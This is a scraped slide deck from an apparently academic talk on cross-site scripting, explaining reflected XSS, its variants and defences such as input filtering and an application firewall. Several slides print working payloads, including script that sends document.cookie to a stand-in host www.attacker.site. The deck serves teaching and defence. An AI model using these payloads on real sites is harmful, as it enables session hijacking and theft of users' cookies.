SlideShare a Scribd company logo

Css

Download as PPT, PDF
B
bismasheikh3

Cross Site Scripting (XSS) involves injecting malicious JavaScript code into a vulnerable web application that is then executed by a victim's browser and can be used to steal cookies and impersonate users. The document discusses how XSS works, variations of the attack, and how to secure applications and test for vulnerabilities. It also explains how the AppShield web application firewall and AppScan scanning tool from Sanctum protect against and detect XSS attacks.

Technology
1 of 30
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Cross Site Scripting Moutasem Hamour Supervised By: Dr. Lo’ai Tawalbeh New York Institute of Technology (NYIT)-Amman
● Introduction ● Full explanation – the CSS technique ● Scope and feasibility -Variations on the theme ● Other ways to perform (traditional) CSS attacks ● What went wrong? ● Securing a site against CSS attacks ● How to check if your site is protected from CSS ● How Sanctum’s AppShield protects against CSS attacks ● How Sanctum’s AppScan scans for CSS vulnerabilities
Introduction ● Cross Site Scripting (CSS for short, but sometimes abbreviated as XSS) is one of the most common application level attacks that hackers use to sneak into web applications today. ● Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. ● Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site.
Introduction (Cont....) ● The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user.
Introduction (Cont....) ● Example :- ● in one audit conducted for a large company it was possible to peek at the user’s credit card number and private information using a CSS attack. This was achieved by running malicious Javascript code at the victim (client) browser, with the “access privileges” of the web site. These are the very limited Javascript privileges which generally do not let the script access anything but site related information. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. The result, the attacker gains the cookies and impersonates the victim.
Full explanation – the CSS technique ● I will consider the under attack site is www.vulnerable.com At the core of a traditional CSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or path) and echoes it back to the response page, in full or in part, without first sanitizing it i.e. making sure it doesn’t contain Javascript code and/or HTML tags.
Full explanation – the CSS technique(Cont...) ● This script is named welcome.cgi, and its parameter is “name”. It can be operated this way: GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0 Host: www.vulnerable.site ... And the response would be: <HTML> <Title>Welcome!</Title> Hi Joe Hacker <BR> Welcome to our system ... </HTML>
Full explanation – the CSS technique(Cont...) ● How can this be abused? Well, the attacker manages to lure the victim client into clicking a link the attacker supplies to him/her. This is a carefully and maliciously crafted link, which causes the web browser of the victim to access the site (www.vulnerable.site) and invoke the vulnerable script. The data to the script consists of a Javascript that accesses the cookies the client browser has for www.vulnerable.site. It is allowed, since the client browser “experiences” the Javascript coming from www.vulnerable.site, and Javascript’s security model allows scripts arriving from a particular site to access cookies belonging to that site.
Full explanation – the CSS technique(Cont...) ● Such a link looks like: http://www.vulnerable.site/welcome.cgi?name=<script> alert(document.cookie)</script> The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows: GET/welcome.cgi?name=<script>alert(document.cookie) </script> HTTP/1.0 Host: www.vulnerable.site And the vulnerable site response would be: <HTML> <Title>Welcome!</Title> Hi <script>alert(document.cookie)</script> <BR> Welcome to our system </HTML>
Full explanation – the CSS technique(Cont...) ● The victim client’s browser would interpret this response as an HTML page containing a piece of Javascript code. This code, when executed, is allowed to access all cookies belonging to www.vulnerable.site, and therefore, it will pop-up a window at the client browser showing all client cookies belonging to www.vulnerable.site. ● Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a web site (www.attacker.site), and use a script to receive the cookies. Instead of popping up a window, the attacker would write a code that accesses a URL at his/her own site (www.attacker.site), invoking the cookie reception script with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.site server.
Full explanation – the CSS technique(Cont...) ● The malicious link would be: http://www.vulnerable.site/welcome.cgi?name=<script>window.op en(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.coo kie)</script> And the response page would look like: <HTML> <Title>Welcome!</Title> Hi <script>window.open(“http://www.attacker.site/collect.cgi?cookie =”+document.cookie)</script> <BR> Welcome to our system ... </HTML>
Full explanation – the CSS technique(Cont...) ● The browser, immediately upon loading this page, would execute the embedded Javascript and would send a request to the collect.cgi script in www.attacker.site, with the value of the cookies of www.vulnerable.site that the browser already has. ● This compromises the cookies of www.vulnerable.site that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached. ● It should be noted, that causing the Javascript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to a CSS attack. If Javascript’s “alert” function can be called, there’s usually no reason for the “window.open” call not to succeed. That is why most examples for CSS attacks use the alert function, which makes it very easy to detect its success.
Css
Scope and feasibility ● The attack can take place only at the victim’s browser, the same one used to access the site (www.vulnerable.site). The attacker needs to force the client to access the malicious link. This can happen in several ways: - The attacker sends an email containing an HTML page that forces the browser to access the link. This requires the victim use the HTML enabled email client, and the HTML viewer at the client is the same browser used for accessing www.vulnerable.site. - The client visits a site, perhaps operated by the attacker, where a link to an image or otherwise active HTML forces the browser to access the link. Again, it is mandatory that the same browser be used for accessing this site and www.vulnerable.site.
Scope and feasibility (Cont...) ● The malicious Javascript can access: - Permanent cookies (of www.vulnerable.site) maintained by the browser. - RAM cookies (of www.vulnerable.site) maintained by this instance of the browser, only when it is currently browsing www.vulnerable.site - Names of other windows opened for www.vulnerable.site ● Identification/authentication/authorization tokens are usually maintained as cookies. If these cookies are permanent, the victim is vulnerable to the attack even if he/she is not using the browser at the moment to access www.vulnerable.site. If, however, the cookies are temporary i.e. RAM cookies, then the client must be in session with www.vulnerable.site.
Scope and feasibility (Cont...) ● Other possible implementations for an identification token is a URL parameter. In such cases, it is possible to access other windows using Javascript as follows (assuming the name of the page whose URL parameters are needed is “foobar”): <script>var victim_window=open('','foobar');alert('Can access:'+victim_window.location.search) </script>
Variations on the theme ● It is possible to use many HTML tags, beside <SCRIPT> in order to run the Javascript. In fact, it is also possible for the malicious Javascript code to reside on another server, and to force the client to download the script and execute it which can be useful if a lot of code is to be run, or when the code contains special characters. Some variations: Instead of <script>...</script>, one can use <img src=”javascript:...”> (good for sites that filter the <script> HTML tag) Instead of <script>...</script>, it is possible to use <script src=”http://...”> . This is good for a situation where the Javascript code is too long, or contains forbidden characters.
Variations on the theme(Cont...) ● Sometimes, the data embedded in the response page is found in non-free HTML context. In this case, it is first necessary to “escape” to the free context, and then to append the CSS attack. For example, if the data is injected as a default value of an HTML form field, e.g.: ... <input type=text name=user value=”...”> ... Then it is necessary to include “> in the beginning of the data to ensure escaping to the free HTML context. The data would be: “><script>window.open(“http://www.attacker.site/collect.cgi?cookie= ”+document.cookie)</s cript> And the resulting HTML would be: ... <input type=text name=user value=”“><script>window.open(“http://www.attacker.site/collect.cg i?cookie=”+document.co okie)</script>”> ...
Other ways to perform (traditional) CSS attacks ● So far we’ve seen that a CSS attack can take place in a parameter of a GET request which is echoed back to the response by a script. But it is also possible to carry out the attack with POST request, or using the path component of the HTTP request, and even using some HTTP headers (such as the Referer). Particularly, the path component is useful when an error page returns the erroneous path. In this case, often including the malicious script in the path will execute it. Many web servers are found vulnerable to this attack.
What went wrong? ● It should be understood that although the web site is not directly affected by this attack -it continues to function normally, malicious code is not executed on the site, no DoS condition occurs, and data is not directly manipulated/read from the site- it is still a flaw in the privacy the site offers its’ clients. Just like a site deploying an application with weak security tokens, wherein an attacker can guess the security token of a victim client and impersonate him/her, the same can be said here.
What went wrong?(Cont...) ● The weak spot in the application is the script that echoes back its parameter, regardless of its value. A good script makes sure that the parameter is of a proper format, and contains reasonable characters, etc. There is usually no good reason for a valid parameter to include HTML tags or Javascript code, and these should be removed from the parameter prior to it being embedded in the response or prior to processing it in the application, to be on the safe side!
Securing a site against CSS attacks ● It is possible to secure a site against a CSS attack in three ways: 1. By performing “in-house” input filtering (sometimes called “input sanitation”). For each user input be it a parameter or an HTTP header, in each script written in-house, advanced filtering against HTML tags including Javascript code should be applied. For example, the “welcome.cgi” script from the above case study should filter the “<script>” tag once it is through decoding the “name” parameter. This method has some severe downsides: It requires the application programmer to be well versed in security. It requires the programmer to cover all possible input sources (query parameters, body parameters of POST request, HTTP headers). It cannot defend against vulnerabilities in third party scripts/servers. For example, it won’t defend against problems in error pages in web servers (which display the path of the resource).
Securing a site against CSS attacks(Cont...) 2. By performing “output filtering”, that is, to filter the user data when it is sent back to the browser, rather than when it is received by a script. A good example for this would be a script that inserts the input data to a database, and then presents it. In this case, it is important not to apply the filter to the original input string, but only to the output version. The drawbacks are similar to the ones in input filtering. 3. By installing a third party application firewall, which intercepts CSS attacks before they reach the web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods (including path and HTTP headers) in a generic way, regardless of the script/path from the in-house application, a third party script, or a script describing no resource at all (e.g. designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and Javascript patterns, and if any match, the request is rejected and the malicious input does not arrive to the server.
How to check if your site is protected from CSS ● Checking that a site is secure from CSS attacks is the logical conclusion of securing the site. ● Just like securing a site against CSS, checking that the site is indeed secure can be done manually (the hard way), or via an automated web application vulnerability assessment tool, which offloads the burden of checking. The tool crawls the site, and then launches all the variants it knows against all the scripts it found – trying the parameters, the headers and the paths. In both methods, each input to the application (parameters of all scripts, HTTP headers, path) is checked with as many variations as possible, and if the response page contains the Javascript code in a context where the browser can execute it then a CSS vulnerability is exposed. For example, sending the text: <script>alert(document.cookie)</script>
How to check if your site is protected from CSS (Cont....) ● to each parameter of each script, via a Javascript enabled browser to reveal a CSS vulnerability of the simplest kind – the browser will pop up the Javascript alert window if the text is interpreted as Javascript code. ● Of course, there are several variants, and therefore, testing only the above variant is insufficient. And as we saw above, it is possible to inject Javascript into various fields of the request – the parameters, the HTTP headers, and the path. In some cases (notably the HTTP Referer header), it is awkward to carry out the attack using a browser.
How Sanctum’s AppShield protects against CSS attacks ● AppShield, Sanctum’s Web application firewall, is a secure proxy positioned in front of the web server, and protecting it, and all the code and data sitting behind it, from attack. AppShield inspects all incoming requests. Therefore, any CSS attack attempt will send the request (to welcome.cgi in the example) to AppShield, instead of directly to the web server. AppShield inspects the parameters of the request before forwarding it to the server. AppShield’s patented Dynamic Policy Recognition technology incorporates sophisticated pattern matching which blocks input potentially used for CSS attacks. For example, the patterns cover the following strings as referred to in this paper: <script>...</script> <body onload="javascript:..">
How Sanctum’s AppShield protects against CSS attacks(Cont...) ● In the example, there is a parameter whose value contains the string <script>window.open(“http://www.attacker.site/collect.cgi?cookie= ”+document.cookie)</script> Upon spotting this illegal pattern, AppShield blocks the request and logs the attack attempt.
How Sanctum’s AppScan scans for CSS vulnerabilities ● to mutate all "reasonable" parameters into various CSS attack variants. For example, it may try to inject the string <script>alert("CSS is possible")</script> into all parameters of all scripts. ● AppScan's uniquely comprehensive assembly of CSS attacks enables it to penetrate some applications that are resistant to simple CSS attacks. ● For each script it tries to attack, AppScan will inspect the results (the script response), and if the Javascript code is detected (that is, if the string returned as is - intact and in fullness: <script>alert("CSS is possible")</script>), it indicates that the attack succeeded (because the browser of the victim will execute the JS code). Moreover, the internal browser in AppScan will pop-up the Javascript alert window with the text "CSS is possible", which graphically demonstrates that the Javascript code was indeed executed.
Conclusion Cross Site Scripting is one of the most common application level attacks that hackers use to sneak into web applications today, and one of the most dangerous. It is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, this is often done without the knowledge of either the client or the organization being attacked. In order to prevent this malicious vulnerability, it is critical that an organization implement both an online and offline security strategy. This includes using an automated application vulnerability assessment tool, like AppScan from Sanctum, which can test for all the common web vulnerabilities, and application specific vulnerabilities (like cross site scripting) on a site. And for a full online defense, installing an application firewall, like AppShield from Sanctum, that can detect and defend against any type of manipulation to the code and content sitting on and behind the web servers.
TANK YOU

More Related Content

PDF
Complete xss walkthrough
Ahmed Elhady Mohamed
 
PPTX
Xss
Rajendra Dangwal
 
PDF
Xss 101 by-sai-shanthan
Raghunath G
 
PDF
Securing your web application through HTTP headers
Andre N. Klingsheim
 
PPTX
CSRF Attack and Its Prevention technique in ASP.NET MVC
Suvash Shah
 
PPTX
Cos 432 web_security
Michael Freyberger
 
PDF
DOM-based XSS
Krassen Deltchev
 
PPTX
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Nilesh Sapariya
 
Complete xss walkthrough
Ahmed Elhady Mohamed
 
Xss
Rajendra Dangwal
 
Xss 101 by-sai-shanthan
Raghunath G
 
Securing your web application through HTTP headers
Andre N. Klingsheim
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
Suvash Shah
 
Cos 432 web_security
Michael Freyberger
 
DOM-based XSS
Krassen Deltchev
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Nilesh Sapariya
 

What's hot (15)

PPSX
Web Security
Supankar Banik
 
PPT
Top Ten Tips For Tenacious Defense In Asp.Net
alsmola
 
PDF
Client side
Михаил Фирстов
 
PDF
JSON Web Token
Deddy Setyadi
 
PDF
mjs
Ivan Elkin
 
PDF
VSA: The Virtual Scripted Attacker, Brucon 2012
Abraham Aranguren
 
PDF
Web Security 101
Michael Peters
 
PDF
Gateway and secure micro services
Jordan Valdma
 
PDF
Grey H@t - Cross-site Request Forgery
Christopher Grayson
 
PDF
ClubHack Magazine issue April 2012
ClubHack
 
PDF
Google chrome presentation
reza jalaluddin
 
PPTX
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
PPT
Security Vulnerabilities
Marius Vorster
 
PPTX
Attacking Web Applications
Sasha Goldshtein
 
PPTX
Secure webbrowsing 1
UT, San Antonio
 
Web Security
Supankar Banik
 
Top Ten Tips For Tenacious Defense In Asp.Net
alsmola
 
Client side
Михаил Фирстов
 
JSON Web Token
Deddy Setyadi
 
mjs
Ivan Elkin
 
VSA: The Virtual Scripted Attacker, Brucon 2012
Abraham Aranguren
 
Web Security 101
Michael Peters
 
Gateway and secure micro services
Jordan Valdma
 
Grey H@t - Cross-site Request Forgery
Christopher Grayson
 
ClubHack Magazine issue April 2012
ClubHack
 
Google chrome presentation
reza jalaluddin
 
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
Security Vulnerabilities
Marius Vorster
 
Attacking Web Applications
Sasha Goldshtein
 
Secure webbrowsing 1
UT, San Antonio
 
Ad

Similar to Css (20)

PPTX
Hack using firefox
Reza Nurfachmi
 
PPTX
Cross site scripting
kinish kumar
 
KEY
DVWA BruCON Workshop
testuser1223
 
PPTX
Client sidesec 2013 - script injection
Tal Be'ery
 
PDF
Advanced xss
Gajendra Saini
 
PDF
Chapter 13 web security
newbie2019
 
PPTX
Web application security
Jin Castor
 
PDF
Securing your AngularJS Application
Philippe De Ryck
 
KEY
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
PPT
Same Origin Policy Weaknesses
kuza55
 
PDF
Secure Coding BSSN Semarang Material.pdf
nanangAris1
 
PDF
Mario heiderich. got your nose! how to steal your precious data without using...
Yury Chemerkin
 
DOCX
logout.php Session Data after Logout Username Email . $_.docx
smile790243
 
PDF
Evolution Of Web Security
Chris Shiflett
 
PDF
Html5 hacking
Iftach Ian Amit
 
PDF
Beyond xss (SheHacks Nairobi 2018)
Munir Njiru
 
PPTX
Web Security Attacks
Sajid Hasan
 
PPT
Application Security
nirola
 
PPTX
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
PDF
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT - Multimediatreff
 
Hack using firefox
Reza Nurfachmi
 
Cross site scripting
kinish kumar
 
DVWA BruCON Workshop
testuser1223
 
Client sidesec 2013 - script injection
Tal Be'ery
 
Advanced xss
Gajendra Saini
 
Chapter 13 web security
newbie2019
 
Web application security
Jin Castor
 
Securing your AngularJS Application
Philippe De Ryck
 
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Same Origin Policy Weaknesses
kuza55
 
Secure Coding BSSN Semarang Material.pdf
nanangAris1
 
Mario heiderich. got your nose! how to steal your precious data without using...
Yury Chemerkin
 
logout.php Session Data after Logout Username Email . $_.docx
smile790243
 
Evolution Of Web Security
Chris Shiflett
 
Html5 hacking
Iftach Ian Amit
 
Beyond xss (SheHacks Nairobi 2018)
Munir Njiru
 
Web Security Attacks
Sajid Hasan
 
Application Security
nirola
 
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT - Multimediatreff
 
Ad

Recently uploaded (20)

PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PPTX
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
PPTX
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
PPTX
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Encapsulation theory and applications.pdf
gurumoop
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
Cloud computing and distributed systems.
kkkkkhan
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
23bcla24
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
A Presentation on Artificial Intelligence
memembruh336
 
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 

Css

  • 1. Cross Site Scripting Moutasem Hamour Supervised By: Dr. Lo’ai Tawalbeh New York Institute of Technology (NYIT)-Amman
  • 2. ● Introduction ● Full explanation – the CSS technique ● Scope and feasibility -Variations on the theme ● Other ways to perform (traditional) CSS attacks ● What went wrong? ● Securing a site against CSS attacks ● How to check if your site is protected from CSS ● How Sanctum’s AppShield protects against CSS attacks ● How Sanctum’s AppScan scans for CSS vulnerabilities
  • 3. Introduction ● Cross Site Scripting (CSS for short, but sometimes abbreviated as XSS) is one of the most common application level attacks that hackers use to sneak into web applications today. ● Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. ● Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site.
  • 4. Introduction (Cont....) ● The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user.
  • 5. Introduction (Cont....) ● Example :- ● in one audit conducted for a large company it was possible to peek at the user’s credit card number and private information using a CSS attack. This was achieved by running malicious Javascript code at the victim (client) browser, with the “access privileges” of the web site. These are the very limited Javascript privileges which generally do not let the script access anything but site related information. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. The result, the attacker gains the cookies and impersonates the victim.
  • 6. Full explanation – the CSS technique ● I will consider the under attack site is www.vulnerable.com At the core of a traditional CSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or path) and echoes it back to the response page, in full or in part, without first sanitizing it i.e. making sure it doesn’t contain Javascript code and/or HTML tags.
  • 7. Full explanation – the CSS technique(Cont...) ● This script is named welcome.cgi, and its parameter is “name”. It can be operated this way: GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0 Host: www.vulnerable.site ... And the response would be: <HTML> <Title>Welcome!</Title> Hi Joe Hacker <BR> Welcome to our system ... </HTML>
  • 8. Full explanation – the CSS technique(Cont...) ● How can this be abused? Well, the attacker manages to lure the victim client into clicking a link the attacker supplies to him/her. This is a carefully and maliciously crafted link, which causes the web browser of the victim to access the site (www.vulnerable.site) and invoke the vulnerable script. The data to the script consists of a Javascript that accesses the cookies the client browser has for www.vulnerable.site. It is allowed, since the client browser “experiences” the Javascript coming from www.vulnerable.site, and Javascript’s security model allows scripts arriving from a particular site to access cookies belonging to that site.
  • 9. Full explanation – the CSS technique(Cont...) ● Such a link looks like: http://www.vulnerable.site/welcome.cgi?name=<script> alert(document.cookie)</script> The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows: GET/welcome.cgi?name=<script>alert(document.cookie) </script> HTTP/1.0 Host: www.vulnerable.site And the vulnerable site response would be: <HTML> <Title>Welcome!</Title> Hi <script>alert(document.cookie)</script> <BR> Welcome to our system </HTML>
  • 10. Full explanation – the CSS technique(Cont...) ● The victim client’s browser would interpret this response as an HTML page containing a piece of Javascript code. This code, when executed, is allowed to access all cookies belonging to www.vulnerable.site, and therefore, it will pop-up a window at the client browser showing all client cookies belonging to www.vulnerable.site. ● Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a web site (www.attacker.site), and use a script to receive the cookies. Instead of popping up a window, the attacker would write a code that accesses a URL at his/her own site (www.attacker.site), invoking the cookie reception script with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.site server.
  • 11. Full explanation – the CSS technique(Cont...) ● The malicious link would be: http://www.vulnerable.site/welcome.cgi?name=<script>window.op en(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.coo kie)</script> And the response page would look like: <HTML> <Title>Welcome!</Title> Hi <script>window.open(“http://www.attacker.site/collect.cgi?cookie =”+document.cookie)</script> <BR> Welcome to our system ... </HTML>
  • 12. Full explanation – the CSS technique(Cont...) ● The browser, immediately upon loading this page, would execute the embedded Javascript and would send a request to the collect.cgi script in www.attacker.site, with the value of the cookies of www.vulnerable.site that the browser already has. ● This compromises the cookies of www.vulnerable.site that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached. ● It should be noted, that causing the Javascript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to a CSS attack. If Javascript’s “alert” function can be called, there’s usually no reason for the “window.open” call not to succeed. That is why most examples for CSS attacks use the alert function, which makes it very easy to detect its success.
  • 14. Scope and feasibility ● The attack can take place only at the victim’s browser, the same one used to access the site (www.vulnerable.site). The attacker needs to force the client to access the malicious link. This can happen in several ways: - The attacker sends an email containing an HTML page that forces the browser to access the link. This requires the victim use the HTML enabled email client, and the HTML viewer at the client is the same browser used for accessing www.vulnerable.site. - The client visits a site, perhaps operated by the attacker, where a link to an image or otherwise active HTML forces the browser to access the link. Again, it is mandatory that the same browser be used for accessing this site and www.vulnerable.site.
  • 15. Scope and feasibility (Cont...) ● The malicious Javascript can access: - Permanent cookies (of www.vulnerable.site) maintained by the browser. - RAM cookies (of www.vulnerable.site) maintained by this instance of the browser, only when it is currently browsing www.vulnerable.site - Names of other windows opened for www.vulnerable.site ● Identification/authentication/authorization tokens are usually maintained as cookies. If these cookies are permanent, the victim is vulnerable to the attack even if he/she is not using the browser at the moment to access www.vulnerable.site. If, however, the cookies are temporary i.e. RAM cookies, then the client must be in session with www.vulnerable.site.
  • 16. Scope and feasibility (Cont...) ● Other possible implementations for an identification token is a URL parameter. In such cases, it is possible to access other windows using Javascript as follows (assuming the name of the page whose URL parameters are needed is “foobar”): <script>var victim_window=open('','foobar');alert('Can access:'+victim_window.location.search) </script>
  • 17. Variations on the theme ● It is possible to use many HTML tags, beside <SCRIPT> in order to run the Javascript. In fact, it is also possible for the malicious Javascript code to reside on another server, and to force the client to download the script and execute it which can be useful if a lot of code is to be run, or when the code contains special characters. Some variations: Instead of <script>...</script>, one can use <img src=”javascript:...”> (good for sites that filter the <script> HTML tag) Instead of <script>...</script>, it is possible to use <script src=”http://...”> . This is good for a situation where the Javascript code is too long, or contains forbidden characters.
  • 18. Variations on the theme(Cont...) ● Sometimes, the data embedded in the response page is found in non-free HTML context. In this case, it is first necessary to “escape” to the free context, and then to append the CSS attack. For example, if the data is injected as a default value of an HTML form field, e.g.: ... <input type=text name=user value=”...”> ... Then it is necessary to include “> in the beginning of the data to ensure escaping to the free HTML context. The data would be: “><script>window.open(“http://www.attacker.site/collect.cgi?cookie= ”+document.cookie)</s cript> And the resulting HTML would be: ... <input type=text name=user value=”“><script>window.open(“http://www.attacker.site/collect.cg i?cookie=”+document.co okie)</script>”> ...
  • 19. Other ways to perform (traditional) CSS attacks ● So far we’ve seen that a CSS attack can take place in a parameter of a GET request which is echoed back to the response by a script. But it is also possible to carry out the attack with POST request, or using the path component of the HTTP request, and even using some HTTP headers (such as the Referer). Particularly, the path component is useful when an error page returns the erroneous path. In this case, often including the malicious script in the path will execute it. Many web servers are found vulnerable to this attack.
  • 20. What went wrong? ● It should be understood that although the web site is not directly affected by this attack -it continues to function normally, malicious code is not executed on the site, no DoS condition occurs, and data is not directly manipulated/read from the site- it is still a flaw in the privacy the site offers its’ clients. Just like a site deploying an application with weak security tokens, wherein an attacker can guess the security token of a victim client and impersonate him/her, the same can be said here.
  • 21. What went wrong?(Cont...) ● The weak spot in the application is the script that echoes back its parameter, regardless of its value. A good script makes sure that the parameter is of a proper format, and contains reasonable characters, etc. There is usually no good reason for a valid parameter to include HTML tags or Javascript code, and these should be removed from the parameter prior to it being embedded in the response or prior to processing it in the application, to be on the safe side!
  • 22. Securing a site against CSS attacks ● It is possible to secure a site against a CSS attack in three ways: 1. By performing “in-house” input filtering (sometimes called “input sanitation”). For each user input be it a parameter or an HTTP header, in each script written in-house, advanced filtering against HTML tags including Javascript code should be applied. For example, the “welcome.cgi” script from the above case study should filter the “<script>” tag once it is through decoding the “name” parameter. This method has some severe downsides: It requires the application programmer to be well versed in security. It requires the programmer to cover all possible input sources (query parameters, body parameters of POST request, HTTP headers). It cannot defend against vulnerabilities in third party scripts/servers. For example, it won’t defend against problems in error pages in web servers (which display the path of the resource).
  • 23. Securing a site against CSS attacks(Cont...) 2. By performing “output filtering”, that is, to filter the user data when it is sent back to the browser, rather than when it is received by a script. A good example for this would be a script that inserts the input data to a database, and then presents it. In this case, it is important not to apply the filter to the original input string, but only to the output version. The drawbacks are similar to the ones in input filtering. 3. By installing a third party application firewall, which intercepts CSS attacks before they reach the web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods (including path and HTTP headers) in a generic way, regardless of the script/path from the in-house application, a third party script, or a script describing no resource at all (e.g. designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and Javascript patterns, and if any match, the request is rejected and the malicious input does not arrive to the server.
  • 24. How to check if your site is protected from CSS ● Checking that a site is secure from CSS attacks is the logical conclusion of securing the site. ● Just like securing a site against CSS, checking that the site is indeed secure can be done manually (the hard way), or via an automated web application vulnerability assessment tool, which offloads the burden of checking. The tool crawls the site, and then launches all the variants it knows against all the scripts it found – trying the parameters, the headers and the paths. In both methods, each input to the application (parameters of all scripts, HTTP headers, path) is checked with as many variations as possible, and if the response page contains the Javascript code in a context where the browser can execute it then a CSS vulnerability is exposed. For example, sending the text: <script>alert(document.cookie)</script>
  • 25. How to check if your site is protected from CSS (Cont....) ● to each parameter of each script, via a Javascript enabled browser to reveal a CSS vulnerability of the simplest kind – the browser will pop up the Javascript alert window if the text is interpreted as Javascript code. ● Of course, there are several variants, and therefore, testing only the above variant is insufficient. And as we saw above, it is possible to inject Javascript into various fields of the request – the parameters, the HTTP headers, and the path. In some cases (notably the HTTP Referer header), it is awkward to carry out the attack using a browser.
